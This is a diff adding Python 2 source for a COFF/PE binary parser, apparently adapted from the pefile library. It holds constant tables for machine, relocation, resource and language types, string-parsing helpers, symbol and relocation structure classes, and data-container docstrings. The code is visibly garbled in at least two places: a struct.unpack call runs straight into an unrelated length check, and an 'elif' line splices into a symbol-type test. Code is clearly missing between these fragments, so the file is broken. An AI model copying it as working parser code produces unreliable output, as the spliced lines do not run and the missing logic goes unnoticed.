+ ('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', 9),
+ ('IMAGE_SUBSYSTEM_EFI_APPLICATION', 10),
+ ('IMAGE_SUBSYSTEM_EFI_BOOT_ SERVICE_DRIVER', 11),
+ ('IMAGE_SUBSYSTEM_EFI_RUNTIME_ DRIVER', 12),
+ ('IMAGE_SUBSYSTEM_EFI_ROM', 13),
+ ('IMAGE_SUBSYSTEM_XBOX', 14)]
+
+SUBSYSTEM_TYPE = dict([(e[1], e[0]) for e in subsystem_types]+subsystem_types)
+
+machine_types = [
+ ('IMAGE_FILE_MACHINE_UNKNOWN', 0),
+ ('IMAGE_FILE_MACHINE_AM33', 0x1d3),
+ ('IMAGE_FILE_MACHINE_AMD64', 0x8664),
+ ('IMAGE_FILE_MACHINE_ARM', 0x1c0),
+ ('IMAGE_FILE_MACHINE_EBC', 0xebc),
+ ('IMAGE_FILE_MACHINE_I386', 0x14c),
+ ('IMAGE_FILE_MACHINE_IA64', 0x200),
+ ('IMAGE_FILE_MACHINE_MR32', 0x9041),
+ ('IMAGE_FILE_MACHINE_MIPS16', 0x266),
+ ('IMAGE_FILE_MACHINE_MIPSFPU', 0x366),
+ ('IMAGE_FILE_MACHINE_MIPSFPU16',0x466),
+ ('IMAGE_FILE_MACHINE_POWERPC', 0x1f0),
+ ('IMAGE_FILE_MACHINE_POWERPCFP',0x1f1),
+ ('IMAGE_FILE_MACHINE_R4000', 0x166),
+ ('IMAGE_FILE_MACHINE_SH3', 0x1a2),
+ ('IMAGE_FILE_MACHINE_SH3DSP', 0x1a3),
+ ('IMAGE_FILE_MACHINE_SH4', 0x1a6),
+ ('IMAGE_FILE_MACHINE_SH5', 0x1a8),
+ ('IMAGE_FILE_MACHINE_THUMB', 0x1c2),
+ ('IMAGE_FILE_MACHINE_WCEMIPSV2',0x169),
+ ]
+
+MACHINE_TYPE = dict([(e[1], e[0]) for e in machine_types]+machine_types)
+
+# I386 COFF relocation types.
+i386_coff_relocation_types = [
+ ('IMAGE_REL_I386_ABSOLUTE', 0x0000 ), # Reference is absolute, no relocation is necessary
+ ('IMAGE_REL_I386_DIR16', 0x0001 ), # Direct 16-bit reference to the symbols virtual address
+ ('IMAGE_REL_I386_REL16', 0x0002 ), # PC-relative 16-bit reference to the symbols virtual address
+ ('IMAGE_REL_I386_DIR32', 0x0006 ), # Direct 32-bit reference to the symbols virtual address
+ ('IMAGE_REL_I386_DIR32NB', 0x0007 ), # Direct 32-bit reference to the symbols virtual address, base not included
+ ('IMAGE_REL_I386_SEG12', 0x0009 ), # Direct 16-bit reference to the segment-selector bits of a 32-bit virtual address
+ ('IMAGE_REL_I386_SECTION', 0x000A ),
+ ('IMAGE_REL_I386_SECREL', 0x000B ),
+ ('IMAGE_REL_I386_TOKEN', 0x000C ), # clr token
+ ('IMAGE_REL_I386_SECREL7', 0x000D ), # 7 bit offset from base of section containing target
+ ('IMAGE_REL_I386_REL32', 0x0014 )] # PC-relative 32-bit reference to the symbols virtual address
+
+I386_COFF_RELOCATION_TYPES = dict([(e[1], e[0]) for e in i386_coff_relocation_types]+i386_coff_relocation_types)
+
+relocation_types = [
+ ('IMAGE_REL_BASED_ABSOLUTE', 0),
+ ('IMAGE_REL_BASED_HIGH', 1),
+ ('IMAGE_REL_BASED_LOW', 2),
+ ('IMAGE_REL_BASED_HIGHLOW', 3),
+ ('IMAGE_REL_BASED_HIGHADJ', 4),
+ ('IMAGE_REL_BASED_MIPS_JMPADDR', 5),
+ ('IMAGE_REL_BASED_SECTION', 6),
+ ('IMAGE_REL_BASED_REL', 7),
+ ('IMAGE_REL_BASED_MIPS_JMPADDR16', 9),
+ ('IMAGE_REL_BASED_IA64_IMM64', 9),
+ ('IMAGE_REL_BASED_DIR64', 10),
+ ('IMAGE_REL_BASED_HIGH3ADJ', 11) ]
+
+RELOCATION_TYPE = dict([(e[1], e[0]) for e in relocation_types]+relocation_types)
+
+short_import_types = [
+ ('IMPORT_CODE', 0x0000 ), # Executable Code
+ ('IMPORT_DATA', 0x0001 ), # Data
+ ('IMPORT_CONST', 0x0002 )] # Specified as CONST in the .def file.
+
+SHORT_IMPORT_TYPES = dict([(e[1], e[0]) for e in short_import_types]+short_import_types)
+
+short_import_name_types = [
+ ('IMPORT_ORDINAL', 0x0000 ),
+ ('IMPORT_NAME', 0x0001 ),
+ ('IMPORT_NAME_NOPREFIX', 0x0002 ),
+ ('IMPORT_NAME_UNDECORATE', 0x0003 )]
+
+SHORT_IMPORT_NAME_TYPES = dict([(e[1], e[0]) for e in short_import_name_types]+short_import_name_types)
+
+dll_characteristics = [
+ ('IMAGE_DLL_CHARACTERISTICS_RESERVED_0x0001', 0x0001),
+ ('IMAGE_DLL_CHARACTERISTICS_RESERVED_0x0002', 0x0002),
+ ('IMAGE_DLL_CHARACTERISTICS_RESERVED_0x0004', 0x0004),
+ ('IMAGE_DLL_CHARACTERISTICS_RESERVED_0x0008', 0x0008),
+ ('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', 0x0040),
+ ('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', 0x0080),
+ ('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', 0x0100),
+ ('IMAGE_DLL_CHARACTERISTICS_NO_ISOLATION', 0x0200),
+ ('IMAGE_DLL_CHARACTERISTICS_NO_SEH', 0x0400),
+ ('IMAGE_DLL_CHARACTERISTICS_NO_BIND', 0x0800),
+ ('IMAGE_DLL_CHARACTERISTICS_RESERVED_0x1000', 0x1000),
+ ('IMAGE_DLL_CHARACTERISTICS_WDM_DRIVER', 0x2000),
+ ('IMAGE_DLL_CHARACTERISTICS_TERMINAL_SERVER_AWARE', 0x8000) ]
+
+DLL_CHARACTERISTICS = dict([(e[1], e[0]) for e in dll_characteristics]+dll_characteristics)
+
+# Resource types
+resource_type = [
+ ('RT_CURSOR', 1),
+ ('RT_BITMAP', 2),
+ ('RT_ICON', 3),
+ ('RT_MENU', 4),
+ ('RT_DIALOG', 5),
+ ('RT_STRING', 6),
+ ('RT_FONTDIR', 7),
+ ('RT_FONT', 8),
+ ('RT_ACCELERATOR', 9),
+ ('RT_RCDATA', 10),
+ ('RT_MESSAGETABLE', 11),
+ ('RT_GROUP_CURSOR', 12),
+ ('RT_GROUP_ICON', 14),
+ ('RT_VERSION', 16),
+ ('RT_DLGINCLUDE', 17),
+ ('RT_PLUGPLAY', 19),
+ ('RT_VXD', 20),
+ ('RT_ANICURSOR', 21),
+ ('RT_ANIICON', 22),
+ ('RT_HTML', 23),
+ ('RT_MANIFEST', 24) ]
+
+RESOURCE_TYPE = dict([(e[1], e[0]) for e in resource_type]+resource_type)
+
+# Language definitions
+lang = [
+ ('LANG_NEUTRAL', 0x00),
+ ('LANG_INVARIANT', 0x7f),
+ ('LANG_AFRIKAANS', 0x36),
+ ('LANG_ALBANIAN', 0x1c),
+ ('LANG_ARABIC', 0x01),
+ ('LANG_ARMENIAN', 0x2b),
+ ('LANG_ASSAMESE', 0x4d),
+ ('LANG_AZERI', 0x2c),
+ ('LANG_BASQUE', 0x2d),
+ ('LANG_BELARUSIAN', 0x23),
+ ('LANG_BENGALI', 0x45),
+ ('LANG_BULGARIAN', 0x02),
+ ('LANG_CATALAN', 0x03),
+ ('LANG_CHINESE', 0x04),
+ ('LANG_CROATIAN', 0x1a),
+ ('LANG_CZECH', 0x05),
+ ('LANG_DANISH', 0x06),
+ ('LANG_DIVEHI', 0x65),
+ ('LANG_DUTCH', 0x13),
+ ('LANG_ENGLISH', 0x09),
+ ('LANG_ESTONIAN', 0x25),
+ ('LANG_FAEROESE', 0x38),
+ ('LANG_FARSI', 0x29),
+ ('LANG_FINNISH', 0x0b),
+ ('LANG_FRENCH', 0x0c),
+ ('LANG_GALICIAN', 0x56),
+ ('LANG_GEORGIAN', 0x37),
+ ('LANG_GERMAN', 0x07),
+ ('LANG_GREEK', 0x08),
+ ('LANG_GUJARATI', 0x47),
+ ('LANG_HEBREW', 0x0d),
+ ('LANG_HINDI', 0x39),
+ ('LANG_HUNGARIAN', 0x0e),
+ ('LANG_ICELANDIC', 0x0f),
+ ('LANG_INDONESIAN', 0x21),
+ ('LANG_ITALIAN', 0x10),
+ ('LANG_JAPANESE', 0x11),
+ ('LANG_KANNADA', 0x4b),
+ ('LANG_KASHMIRI', 0x60),
+ ('LANG_KAZAK', 0x3f),
+ ('LANG_KONKANI', 0x57),
+ ('LANG_KOREAN', 0x12),
+ ('LANG_KYRGYZ', 0x40),
+ ('LANG_LATVIAN', 0x26),
+ ('LANG_LITHUANIAN', 0x27),
+ ('LANG_MACEDONIAN', 0x2f),
+ ('LANG_MALAY', 0x3e),
+ ('LANG_MALAYALAM', 0x4c),
+ ('LANG_MANIPURI', 0x58),
+ ('LANG_MARATHI', 0x4e),
+ ('LANG_MONGOLIAN', 0x50),
+ ('LANG_NEPALI', 0x61),
+ ('LANG_NORWEGIAN', 0x14),
+ ('LANG_ORIYA', 0x48),
+ ('LANG_POLISH', 0x15),
+ ('LANG_PORTUGUESE', 0x16),
+ ('LANG_PUNJABI', 0x46),
+ ('LANG_ROMANIAN', 0x18),
+ ('LANG_RUSSIAN', 0x19),
+ ('LANG_SANSKRIT', 0x4f),
+ ('LANG_SERBIAN', 0x1a),
+ ('LANG_SINDHI', 0x59),
+ ('LANG_SLOVAK', 0x1b),
+ ('LANG_SLOVENIAN', 0x24),
+ ('LANG_SPANISH', 0x0a),
+ ('LANG_SWAHILI', 0x41),
+ ('LANG_SWEDISH', 0x1d),
+ ('LANG_SYRIAC', 0x5a),
+ ('LANG_TAMIL', 0x49),
+ ('LANG_TATAR', 0x44),
+ ('LANG_TELUGU', 0x4a),
+ ('LANG_THAI', 0x1e),
+ ('LANG_TURKISH', 0x1f),
+ ('LANG_UKRAINIAN', 0x22),
+ ('LANG_URDU', 0x20),
+ ('LANG_UZBEK', 0x43),
+ ('LANG_VIETNAMESE', 0x2a),
+ ('LANG_GAELIC', 0x3c),
+ ('LANG_MALTESE', 0x3a),
+ ('LANG_MAORI', 0x28),
+ ('LANG_RHAETO_ROMANCE',0x17),
+ ('LANG_SAAMI', 0x3b),
+ ('LANG_SORBIAN', 0x2e),
+ ('LANG_SUTU', 0x30),
+ ('LANG_TSONGA', 0x31),
+ ('LANG_TSWANA', 0x32),
+ ('LANG_VENDA', 0x33),
+ ('LANG_XHOSA', 0x34),
+ ('LANG_ZULU', 0x35),
+ ('LANG_ESPERANTO', 0x8f),
+ ('LANG_WALON', 0x90),
+ ('LANG_CORNISH', 0x91),
+ ('LANG_WELSH', 0x92),
+ ('LANG_BRETON', 0x93) ]
+
+LANG = dict(lang+[(e[1], e[0]) for e in lang])
+
+# Sublanguage definitions
+sublang = [
+ ('SUBLANG_NEUTRAL', 0x00),
+ ('SUBLANG_DEFAULT', 0x01),
+ ('SUBLANG_SYS_DEFAULT', 0x02),
+ ('SUBLANG_ARABIC_SAUDI_ARABIA', 0x01),
+ ('SUBLANG_ARABIC_IRAQ', 0x02),
+ ('SUBLANG_ARABIC_EGYPT', 0x03),
+ ('SUBLANG_ARABIC_LIBYA', 0x04),
+ ('SUBLANG_ARABIC_ALGERIA', 0x05),
+ ('SUBLANG_ARABIC_MOROCCO', 0x06),
+ ('SUBLANG_ARABIC_TUNISIA', 0x07),
+ ('SUBLANG_ARABIC_OMAN', 0x08),
+ ('SUBLANG_ARABIC_YEMEN', 0x09),
+ ('SUBLANG_ARABIC_SYRIA', 0x0a),
+ ('SUBLANG_ARABIC_JORDAN', 0x0b),
+ ('SUBLANG_ARABIC_LEBANON', 0x0c),
+ ('SUBLANG_ARABIC_KUWAIT', 0x0d),
+ ('SUBLANG_ARABIC_UAE', 0x0e),
+ ('SUBLANG_ARABIC_BAHRAIN', 0x0f),
+ ('SUBLANG_ARABIC_QATAR', 0x10),
+ ('SUBLANG_AZERI_LATIN', 0x01),
+ ('SUBLANG_AZERI_CYRILLIC', 0x02),
+ ('SUBLANG_CHINESE_TRADITIONAL', 0x01),
+ ('SUBLANG_CHINESE_SIMPLIFIED', 0x02),
+ ('SUBLANG_CHINESE_HONGKONG', 0x03),
+ ('SUBLANG_CHINESE_SINGAPORE', 0x04),
+ ('SUBLANG_CHINESE_MACAU', 0x05),
+ ('SUBLANG_DUTCH', 0x01),
+ ('SUBLANG_DUTCH_BELGIAN', 0x02),
+ ('SUBLANG_ENGLISH_US', 0x01),
+ ('SUBLANG_ENGLISH_UK', 0x02),
+ ('SUBLANG_ENGLISH_AUS', 0x03),
+ ('SUBLANG_ENGLISH_CAN', 0x04),
+ ('SUBLANG_ENGLISH_NZ', 0x05),
+ ('SUBLANG_ENGLISH_EIRE', 0x06),
+ ('SUBLANG_ENGLISH_SOUTH_AFRICA', 0x07),
+ ('SUBLANG_ENGLISH_JAMAICA', 0x08),
+ ('SUBLANG_ENGLISH_CARIBBEAN', 0x09),
+ ('SUBLANG_ENGLISH_BELIZE', 0x0a),
+ ('SUBLANG_ENGLISH_TRINIDAD', 0x0b),
+ ('SUBLANG_ENGLISH_ZIMBABWE', 0x0c),
+ ('SUBLANG_ENGLISH_PHILIPPINES', 0x0d),
+ ('SUBLANG_FRENCH', 0x01),
+ ('SUBLANG_FRENCH_BELGIAN', 0x02),
+ ('SUBLANG_FRENCH_CANADIAN', 0x03),
+ ('SUBLANG_FRENCH_SWISS', 0x04),
+ ('SUBLANG_FRENCH_LUXEMBOURG', 0x05),
+ ('SUBLANG_FRENCH_MONACO', 0x06),
+ ('SUBLANG_GERMAN', 0x01),
+ ('SUBLANG_GERMAN_SWISS', 0x02),
+ ('SUBLANG_GERMAN_AUSTRIAN', 0x03),
+ ('SUBLANG_GERMAN_LUXEMBOURG', 0x04),
+ ('SUBLANG_GERMAN_LIECHTENSTEIN', 0x05),
+ ('SUBLANG_ITALIAN', 0x01),
+ ('SUBLANG_ITALIAN_SWISS', 0x02),
+ ('SUBLANG_KASHMIRI_SASIA', 0x02),
+ ('SUBLANG_KASHMIRI_INDIA', 0x02),
+ ('SUBLANG_KOREAN', 0x01),
+ ('SUBLANG_LITHUANIAN', 0x01),
+ ('SUBLANG_MALAY_MALAYSIA', 0x01),
+ ('SUBLANG_MALAY_BRUNEI_DARUSSALAM', 0x02),
+ ('SUBLANG_NEPALI_INDIA', 0x02),
+ ('SUBLANG_NORWEGIAN_BOKMAL', 0x01),
+ ('SUBLANG_NORWEGIAN_NYNORSK', 0x02),
+ ('SUBLANG_PORTUGUESE', 0x02),
+ ('SUBLANG_PORTUGUESE_BRAZILIAN', 0x01),
+ ('SUBLANG_SERBIAN_LATIN', 0x02),
+ ('SUBLANG_SERBIAN_CYRILLIC', 0x03),
+ ('SUBLANG_SPANISH', 0x01),
+ ('SUBLANG_SPANISH_MEXICAN', 0x02),
+ ('SUBLANG_SPANISH_MODERN', 0x03),
+ ('SUBLANG_SPANISH_GUATEMALA', 0x04),
+ ('SUBLANG_SPANISH_COSTA_RICA', 0x05),
+ ('SUBLANG_SPANISH_PANAMA', 0x06),
+ ('SUBLANG_SPANISH_DOMINICAN_REPUBLIC', 0x07),
+ ('SUBLANG_SPANISH_VENEZUELA', 0x08),
+ ('SUBLANG_SPANISH_COLOMBIA', 0x09),
+ ('SUBLANG_SPANISH_PERU', 0x0a),
+ ('SUBLANG_SPANISH_ARGENTINA', 0x0b),
+ ('SUBLANG_SPANISH_ECUADOR', 0x0c),
+ ('SUBLANG_SPANISH_CHILE', 0x0d),
+ ('SUBLANG_SPANISH_URUGUAY', 0x0e),
+ ('SUBLANG_SPANISH_PARAGUAY', 0x0f),
+ ('SUBLANG_SPANISH_BOLIVIA', 0x10),
+ ('SUBLANG_SPANISH_EL_SALVADOR', 0x11),
+ ('SUBLANG_SPANISH_HONDURAS', 0x12),
+ ('SUBLANG_SPANISH_NICARAGUA', 0x13),
+ ('SUBLANG_SPANISH_PUERTO_RICO', 0x14),
+ ('SUBLANG_SWEDISH', 0x01),
+ ('SUBLANG_SWEDISH_FINLAND', 0x02),
+ ('SUBLANG_URDU_PAKISTAN', 0x01),
+ ('SUBLANG_URDU_INDIA', 0x02),
+ ('SUBLANG_UZBEK_LATIN', 0x01),
+ ('SUBLANG_UZBEK_CYRILLIC', 0x02),
+ ('SUBLANG_DUTCH_SURINAM', 0x03),
+ ('SUBLANG_ROMANIAN', 0x01),
+ ('SUBLANG_ROMANIAN_MOLDAVIA', 0x02),
+ ('SUBLANG_RUSSIAN', 0x01),
+ ('SUBLANG_RUSSIAN_MOLDAVIA', 0x02),
+ ('SUBLANG_CROATIAN', 0x01),
+ ('SUBLANG_LITHUANIAN_CLASSIC', 0x02),
+ ('SUBLANG_GAELIC', 0x01),
+ ('SUBLANG_GAELIC_SCOTTISH', 0x02),
+ ('SUBLANG_GAELIC_MANX', 0x03) ]
+
+SUBLANG = dict(sublang+[(e[1], e[0]) for e in sublang])
+
+def parse_nullterm_string(data):
+ offset = 0
+
+ while len(data)>offset and ord(data[offset]):
+ offset+=1
+
+ return data[:offset]
+
+def parse_nullterm_strings(data):
+ """Get an array of ASCII string from within the data."""
+ offset = 0
+ result = []
+
+ while offset < len(data):
+ s = parse_nullterm_string(data[offset:])
+ result.append(s)
+ offset += len(s) + 1
+
+ return result
+
+
+ # char = None
+ # offset = 0
+ # result = []
+
+ # try:
+ # char = data[offset]
+ # except IndexError:
+ # return ''
+
+ # while offset < len(data):
+ # s = ''
+ # while ord(char):
+ # s += char
+ # offset += 1
+ # try:
+ # char = data[offset]
+ # except IndexError:
+ # break
+
+ # result.append(s)
+ # offset += 1
+ # try:
+ # char = data[offset]
+ # except IndexError:
+ # break
+
+ # return result
+
+class UnicodeStringWrapperPostProcessor:
+ """This class attemps to help the process of identifying strings
+ that might be plain Unicode or Pascal. A list of strings will be
+ wrapped on it with the hope the overlappings will help make the
+ decission about their type."""
+
+ def __init__(self, pe, rva_ptr):
+ self.pe = pe
+ self.rva_ptr = rva_ptr
+ self.string = None
+
+
+ def get_rva(self):
+ """Get the RVA of the string."""
+
+ return self.rva_ptr
+
+
+ def __str__(self):
+ """Return the escaped ASCII representation of the string."""
+
+ def convert_char(char):
+ if char in string.printable:
+ return char
+ else:
+ return r'\x%02x' % ord(char)
+
+ if self.string:
+ return ''.join([convert_char(c) for c in self.string])
+
+ return ''
+
+
+ def invalidate(self):
+ """Make this instance None, to express it's no known string type."""
+
+ self = None
+
+
+ def render_pascal_16(self):
+
+ self.string = self.pe.get_string_u_at_rva(
+ self.rva_ptr+2,
+ max_length=self.__get_pascal_16_length())
+
+
+ def ask_pascal_16(self, next_rva_ptr):
+ """The next RVA is taken to be the one immediately following this one.
+
+ Such RVA could indicate the natural end of the string and will be checked
+ with the possible length contained in the first word.
+ """
+
+ length = self.__get_pascal_16_length()
+
+ #print 'Length:%d delta:%d' % (length, (next_rva_ptr - (self.rva_ptr+2)) / 2)
+ if length == (next_rva_ptr - (self.rva_ptr+2)) / 2:
+ self.length = length
+ return True
+
+ return False
+
+
+ def __get_pascal_16_length(self):
+
+ return self.__get_word_value_at_rva(self.rva_ptr)
+
+
+ def __get_word_value_at_rva(self, rva):
+
+ try:
+ data = self.pe.get_data(self.rva_ptr, 2)
+ except PEFormatError, e:
+ return False
+
+ if len(data)<2:
+ return False
+
+ return struct.unpack('self.__format_length__:
+ data = data[:self.__format_length__]
+
+ # OC Patch:
+ # Some malware have incorrect header lengths.
+ # Fail gracefully if this occurs
+ # Buggy malware: a29b0118af8b7408444df81701ad5a7f
+ #
+ elif len(data)> 4] == "IMAGE_SYM_DTYPE_FUNCTION")
+
+ def has_function_implementation(self):
+ return \
+ self.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_EXTERNAL'] \
+ and self.SectionNumber != IMAGE_SYM_UNDEFINED
+
+ def get_function_code(self):
+ if not self.is_function():
+ raise Exception("Symbol is not a function")
+
+ if IMAGE_SYMBOL_CLASSES[self.StorageClass] == "IMAGE_SYM_CLASS_EXTERNAL":
+ if not self.__section__:
+ raise Exception("This symbol is in 'undefined' section.")
+
+ if self.__auxsymbols__ and hasattr(self.__auxsymbols__[0],"TotalSize"):
+ size = self.__auxsymbols__[0].TotalSize
+ else:
+ size = None
+ return self.__section__.get_data(self.Value, size)
+
+ def get_relocations(self):
+ if self.__section__ != None:
+ return self.__section__.relocations
+ else:
+ return []
+
+class AuxSymbolStructure(Structure):
+
+ __Aux_FunctionDefinition_format__ = ('SymbolTable_Aux_FunctionDefinition',
+ ('I,TagIndex', 'I,TotalSize', 'I,PointerToLinenumber',"I,PointerToNextFunction","H,Unused") )
+
+ __Aux_WeakExternal_format__ = ('SymbolTable_Aux_WeakExternal', ('I,TagIndex', 'I,Characteristics', "10s,Unused") )
+
+ def __init__(self, parent, symboltype):
+ if symboltype == 'functiondef':
+ Structure.__init__(self,self.__Aux_FunctionDefinition_format__)
+ elif symboltype == 'weakexternal':
+ Structure.__init__(self,self.__Aux_WeakExternal_format__)
+ else:
+ return None
+ self.__parent__ = parent
+
+ def __unpack__(self, data):
+ Structure.__unpack__(self,data)
+
+ def __unpack_data__(self, format, data, file_offset):
+ """Apply structure format to raw data.
+
+ Returns and unpacked structure object if successful, None otherwise.
+ """
+
+ structure = Structure(format, file_offset=file_offset)
+
+ try:
+ structure.__unpack__(data)
+ except PEFormatError, err:
+ self.__warnings.append(
+ 'Corrupt header "%s" at file offset %d. Exception: %s' % (
+ format[0], file_offset, str(err)) )
+ return None
+
+ return structure
+
+
+class COFFRelocationStructure(Structure):
+ __COFFRelocation_format__ = ('Relocation',
+ ('I,VirtualAddress', 'I,SymbolTableIndex', 'H,Type') )
+
+ def __init__(self,parent):
+ Structure.__init__(self,self.__COFFRelocation_format__)
+ self.__parent__ = parent
+
+ def __unpack__(self, data):
+ Structure.__unpack__(self,data)
+
+ #print "VA: %08x - SymTableIndex: %X - Type: %x" % (self.VirtualAddress, self.SymbolTableIndex, self.Type)
+ #print "Symbol Name:%s, Value:%s, SectionNumber:%x, Type:%x, StorageClass:%x,NumberOfAuxSymbols:%x" % \
+ #(self.symbol.Name,self.symbol.Value,self.symbol.SectionNumber,self.symbol.Type,self.symbol.StorageClass,self.symbol.NumberOfAuxSymbols)
+
+class ShortImportStructure(Structure):
+ __IMPORT_HEADER_format__ = ('IMPORT_HEADER',
+ ('H,Sig1', 'H,Sig2', 'H,Version', 'H,Machine', 'I,TimeDateStamp', 'I,SizeOfData', 'H,OrdinalOrHint','H,TypeAndNameType') )
+
+ def __init__(self):
+ Structure.__init__(self,self.__IMPORT_HEADER_format__)
+ self.__parent__ = self
+
+ def __unpack__(self, data):
+ Structure.__unpack__(self,data)
+ self.Type = self.TypeAndNameType & 0x3
+ self.NameType = (self.TypeAndNameType & 0x1c) >> 2
+ strings = parse_nullterm_strings(data[self.__format_length__:self.__format_length__+self.SizeOfData])
+ self.ImportName = strings[0]
+ self.DLLName = strings[1]
+
+class DataContainer:
+ """Generic data container."""
+
+ def __init__(self, **args):
+ for key, value in args.items():
+ setattr(self, key, value)
+
+
+
+class ImportDescData(DataContainer):
+ """Holds import descriptor information.
+
+ dll: name of the imported DLL
+ imports: list of imported symbols (ImportData instances)
+ struct: IMAGE_IMPORT_DESCRIPTOR sctruture
+ """
+
+class ImportData(DataContainer):
+ """Holds imported symbol's information.
+
+ ordinal: Ordinal of the symbol
+ name: Name of the symbol
+ bound: If the symbol is bound, this contains
+ the address.
+ """
+
+class ExportDirData(DataContainer):
+ """Holds export directory information.
+
+ struct: IMAGE_EXPORT_DIRECTORY structure
+ symbols: list of exported symbols (ExportData instances)
+ """
+
+class ExportData(DataContainer):
+ """Holds exported symbols' information.
+
+ ordinal: ordinal of the symbol
+ address: address of the symbol
+ name: name of the symbol (None if the symbol is
+ exported by ordinal only)
+ forwarder: if the symbol is forwarded it will
+ contain the name of the target symbol,
+ None otherwise.
+ """
+
+
+class ResourceDirData(DataContainer):
+ """Holds resource directory information.
+
+ struct: IMAGE_RESOURCE_DIRECTORY structure
+ entries: list of entries (ResourceDirEntryData instances)
+ """
+
+class ResourceDirEntryData(DataContainer):
+ """Holds resource directory entry data.
+
+ struct: IMAGE_RESOURCE_DIRECTORY_ENTRY structure
+ name: If the resource is identified by name this
+ attribute will contain the name string. None
+ otherwise. If identified by id, the id is
+ availabe at 'struct.Id'
+ id: the id, also in struct.Id
+ directory: If this entry has a lower level directory
+ this attribute will point to the
+ ResourceDirData instance representing it.
+ data: If this entry has no futher lower directories
+ and points to the actual resource data, this
+ attribute will reference the corresponding
+ ResourceDataEntryData instance.
+ (Either of the 'directory' or 'data' attribute will exist,
+ but not both.)
+ """
+
+class ResourceDataEntryData(DataContainer):
+ """Holds resource data entry information.
+
+ struct: IMAGE_RESOURCE_DATA_ENTRY structure
+ lang: Primary language ID
+ sublang: Sublanguage ID
+ """
+
+class DebugData(DataContainer):
+ """Holds debug information.
+
+ struct: IMAGE_DEBUG_DIRECTORY structure
+ """
+
+class BaseRelocationData(DataContainer):
+ """Holds base relocation information.
+
+ struct: IMAGE_BASE_RELOCATION structure
+ entries: list of relocation data (RelocationData instances)
+ """
+
+class RelocationData(DataContainer):
+ """Holds relocation information.
+
+ type: Type of relocation
+ The type string can be obtained by
+ RELOCATION_TYPE[type]
+ rva: RVA of the relocation
+ """
+
+class TlsData(DataContainer):
+ """Holds TLS information.
+
+ struct: IMAGE_TLS_DIRECTORY structure
+ """
+
+class BoundImportDescData(DataContainer):
+ """Holds bound import descriptor data.
+
+ This directory entry will provide with information on the
+ DLLs this PE files has been bound to (if bound at all).
+ The structure will contain the name and timestamp of the
+ DLL at the time of binding so that the loader can know
+ whether it differs from the one currently present in the
+ system and must, therefore, re-bind the PE's imports.
+
+ struct: IMAGE_BOUND_IMPORT_DESCRIPTOR structure
+ name: DLL name
+ entries: list of entries (BoundImportRefData instances)
+ the entries will exist if this DLL has forwarded
+ symbols. If so, the destination DLL will have an
+ entry in this list.
+ """
+
+class BoundImportRefData(DataContainer):
+ """Holds bound import forwader reference data.
+
+ Contains the same information as the bound descriptor but
+ for forwarded DLLs, if any.
+
+ struct: IMAGE_BOUND_FORWARDER_REF structure
+ name: dll name
+ """
+
+class FirstLinkerMemberData(DataContainer):
+ """Holds Linker data from the First Linker Member.
+
+ Header: ARCHIVE_MEMBER_HEADER
+ NumberOfSymbols: the number of symbols
+ Symbols: array of (offset, symbolName) pairs
+ """
+
+class SecondLinkerMemberData(DataContainer):
+ """Holds Linker data from the Second Linker Member.
+
+ Header: ARCHIVE_MEMBER_HEADER
+ NumberOfMembers: the number of Members in the archive
+ NumberOfSymbols: the number of symbols
+ MemberOffsets: array of offsets to Members
+ Symbols: list of (symbol name, index) pairs.
+ The index is a 1-based index into the
+ MemberOffsets list.
+ """
+
+class LongnamesMemberData(DataContainer):
+ """Holds data from the Longnames archive member.
+
+ Header: ARCHIVE_MEMBER_HEADER
+ Names: array of long names.
+ """
+
+class ObjectMemberData(DataContainer):
+ """Holds data from a COFF object member.
+
+ Header: ARCHIVE_MEMBER_HEADER
+ Obj: the COFF object 'file'
+ """
+
+
+
+class COFF:
+ """A Portable Executable representation.
+
+ This class provides access to most of the information in a PE file.
+
+ It expects to be supplied the name of the file to load or PE data
+ to process and an optional argument 'fast_load' (False by default)
+ which controls whether to load all the directories information,
+ which can be quite time consuming.
+
+ pe = pefile.PE('module.dll')
+ pe = pefile.PE(name='module.dll')
+
+ would load 'module.dll' and process it. If the data would be already
+ available in a buffer the same could be achieved with:
+
+ pe = pefile.PE(data=module_dll_data)
+
+ The "fast_load" can be set to a default by setting its value in the
+ module itself by means,for instance, of a "pefile.fast_load = True".
+ That will make all the subsequent instances not to load the
+ whole PE structure. The "full_load" method can be used to parse
+ the missing data at a later stage.
+
+ Basic headers information will be available in the attributes:
+
+ DOS_HEADER
+ NT_HEADERS
+ FILE_HEADER
+ OPTIONAL_HEADER
+
+ All of them will contain among their attrbitues the members of the
+ corresponding structures as defined in WINNT.H
+
+ The raw data corresponding to the header (from the beginning of the
+ file up to the start of the first section) will be avaiable in the
+ instance's attribute 'header' as a string.
+
+ The sections will be available as a list in the 'sections' attribute.
+ Each entry will contain as attributes all the structure's members.
+
+ Directory entries will be available as attributes (if they exist):
+ (no other entries are processed at this point)
+
+ DIRECTORY_ENTRY_IMPORT (list of ImportDescData instances)
+ DIRECTORY_ENTRY_EXPORT (ExportDirData instance)
+ DIRECTORY_ENTRY_RESOURCE (ResourceDirData instance)
+ DIRECTORY_ENTRY_DEBUG (list of DebugData instances)
+ DIRECTORY_ENTRY_BASERELOC (list of BaseRelocationData instances)
+ DIRECTORY_ENTRY_TLS
+ DIRECTORY_ENTRY_BOUND_IMPORT (list of BoundImportData instances)
+
+ The following dictionary attributes provide ways of mapping different
+ constants. They will accept the numeric value and return the string
+ representation and the opposite, feed in the string and get the
+ numeric constant:
+
+ DIRECTORY_ENTRY
+ IMAGE_CHARACTERISTICS
+ SECTION_CHARACTERISTICS
+ DEBUG_TYPE
+ SUBSYSTEM_TYPE
+ MACHINE_TYPE
+ RELOCATION_TYPE
+ RESOURCE_TYPE
+ LANG
+ SUBLANG
+ """
+
+ #
+ # Format specifications for PE structures.
+ #
+
+
+ __IMAGE_FILE_HEADER_format__ = ('IMAGE_FILE_HEADER',
+ ('H,Machine', 'H,NumberOfSections',
+ 'L,TimeDateStamp', 'L,PointerToSymbolTable',
+ 'L,NumberOfSymbols', 'H,SizeOfOptionalHeader',
+ 'H,Characteristics'))
+
+ __IMAGE_DATA_DIRECTORY_format__ = ('IMAGE_DATA_DIRECTORY',
+ ('L,VirtualAddress', 'L,Size'))
+
+
+ __IMAGE_OPTIONAL_HEADER_format__ = ('IMAGE_OPTIONAL_HEADER',
